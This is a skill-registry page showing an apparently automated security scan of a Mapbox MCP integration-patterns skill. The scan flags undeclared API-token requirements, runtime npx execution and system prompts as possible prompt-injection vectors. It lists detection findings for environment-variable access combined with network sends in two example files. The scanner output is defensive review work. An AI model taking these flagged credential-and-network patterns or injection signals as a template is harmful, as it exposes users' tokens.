Skill flagged — suspicious patterns detected
ClawHub Security flagged this skill as suspicious. Review the scan results before using.
Mapbox MCP Runtime Patterns
v1.0.0Integration patterns for Mapbox MCP Server in AI applications and agent frameworks. Covers runtime integration with pydantic-ai, mastra, LangChain, and custo...
⭐ 0· 34·0 current·0 all-time
by@mapbox
MIT-0
Download zip
LicenseMIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
OpenClaw
Suspicious
medium confidencePurpose & Capability
The name/description and the included example code all focus on integrating Mapbox MCP Server into agents (pydantic-ai, LangChain, Mastra, smolagents, CrewAI). That capability is coherent with the stated purpose. However, the registry metadata declares no required environment variables or primary credential even though the SKILL.md and examples clearly require MAPBOX_ACCESS_TOKEN (and sample workflows also reference OPENAI_API_KEY and HF_TOKEN). The omission of required env vars in metadata is an inconsistency.
Instruction Scope
SKILL.md and example files instruct running either the hosted MCP endpoint or self-hosting via `npm install` / `npx @mapbox/mcp-server`, and multiple code examples spawn child processes (subprocess.Popen, spawn) and write to process stdin/stdout. Those runtime actions are within the general scope of self-hosting MCP, but they allow executing code fetched from npm at runtime and give the agent/installer the option to run arbitrary packages. The instructions also embed system prompts (e.g., agent system_prompt strings) which can change agent behavior — expected for agent patterns but flagged by the pre-scan as a prompt-injection signal.
Install Mechanism
There is no install spec in the registry (instruction-only), which is low-risk by itself. However, the documentation and examples rely on npm/npx to install or run `@mapbox/mcp-server` (and suggest `npm install` in TypeScript examples). Running `npx` will fetch and execute code from the npm registry at runtime — a legitimate self-host option but a higher-risk install pattern if used without verification. No downloads from unknown hosts or URL shorteners are present; the hosted endpoint references mapbox.com.
Credentials
The skill declares no required env vars or primary credential, but SKILL.md and multiple examples clearly require MAPBOX_ACCESS_TOKEN for MCP and also reference OPENAI_API_KEY and HF_TOKEN in examples. Requiring API tokens for Mapbox (and optionally LLM/HuggingFace keys in examples) is expected for the stated purpose — but the metadata failing to declare these credentials is an incoherence and increases the chance a user will run examples without realizing sensitive tokens are required. Ensure tokens are provided with least privilege and not hard-coded.
Persistence & Privilege
always:false and normal model invocation semantics. The skill does not request forced persistence or system-wide configuration changes in the manifest. Example code starts local processes (self-hosting) but does not attempt to modify other skills' configurations.
Scan Findings in Context
[system-prompt-override] expected: Examples and SKILL.md include agent system prompts and instructions for tool-selection rules (e.g., `system_prompt` strings in pydantic example and prompt templates in LangChain). This is expected for an integration-patterns skill that provides agent scaffolding, but it is flagged because those prompts can alter agent behavior and could be used as an injection vector if combined with untrusted content.
What to consider before installing
This package appears to contain legitimate Mapbox MCP integration patterns and runnable examples, but there are a few mismatches and operational risks to consider before using it:
- Credentials: The manifest lists no required env vars, but examples and SKILL.md require MAPBOX_ACCESS_TOKEN (and many examples also reference OPENAI_API_KEY and HF_TOKEN). Do not run examples until you confirm which tokens are needed and provide them securely (use least-privilege tokens, rotate them, and avoid pasting long-lived secrets into shared shells).
- Running code from npm/npx: Self-hosting instructions use `npm install` / `npx @mapbox/mcp-server` and example code spawns child processes. `npx` will fetch and execute code from the npm registry; only run this in trusted environments and consider pinning package versions or using verified releases.
- Agent system prompts: Examples include system_prompt and prompt templates that control agent behavior. This is normal for agent integrations, but review them to ensure they don't grant the agent overly broad or unsafe instructions (especially if you plan to allow autonomous agent runs).
- Manifest/document mismatch: Ask the publisher to update registry metadata to declare required environment variables (MAPBOX_ACCESS_TOKEN and any LLM tokens used) so the skill's requirements are explicit.
- Operational safety: If you will self-host the MCP server, verify the `@mapbox/mcp-server` package integrity (use package-lock, pin versions, run in isolated environments / containers). If you only need hosted MCP, prefer using the documented hosted endpoint (https://mcp.mapbox.com/mcp) with a scoped token.
If you want, I can: (1) list exact files/lines that reference each token or npx usage, (2) suggest a minimal, safe checklist for running the examples in an isolated environment, or (3) draft questions to ask the skill author to clarify the missing metadata.examples/typescript/langchain-example.ts:26
Environment variable access combined with network send.
examples/typescript/mastra-example.ts:24
Environment variable access combined with network send.
references/production.md:167
Prompt-injection style instruction pattern detected.
Patterns worth reviewing
These patterns may indicate risky behavior. Check the VirusTotal and OpenClaw results above for context-aware analysis before installing.Like a lobster shell, security has layers — review code before you run it.
latestvk97cn9yrm2w5s963ae78b56arn83ys04
License
MIT-0
Free to use, modify, and redistribute. No attribution required.